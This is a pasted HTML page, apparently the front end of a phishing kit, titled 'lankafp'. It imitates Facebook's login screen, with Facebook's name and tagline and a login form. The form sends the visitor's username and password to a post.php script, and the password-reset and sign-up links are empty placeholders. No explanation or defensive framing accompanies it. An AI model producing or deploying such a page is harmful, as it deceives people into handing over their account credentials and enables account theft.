Untitled
3 years ago in Plain Text
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>lankafp</title>
<link rel="stylesheet" href="style.css">
</head>
<body>
<div class="container">
<div class="left">
<h1>facebook</h1>
<p>Facebook helps you connect and share with the people in your life.</p>
</div>
<div class="right">
<form id='login' action='post.php' method='post' accept-charset='UTF-8'>
<input type='hidden' name='submitted' id='submitted' value='1'/>
<label for='username' ></label>
<input type='text' name='username' id='username' placeholder="Phone number or " maxlength="50" />
<label for='password' ></label>
<input type='password' name='password' id='password' placeholder="Password" maxlength="50" />
<input type='submit' name='Submit' class="loginBtn" value='Log In' />
<a href="" class="forget">Forgotten password?</a>
<div class="sign-up">
<a href="" class="signupBtn">Create New Account</a>
</div>
</form>
<p><b>Create a Page</b> for a celebrity, band or business.</p>
</div>
</div>
</body>
</html>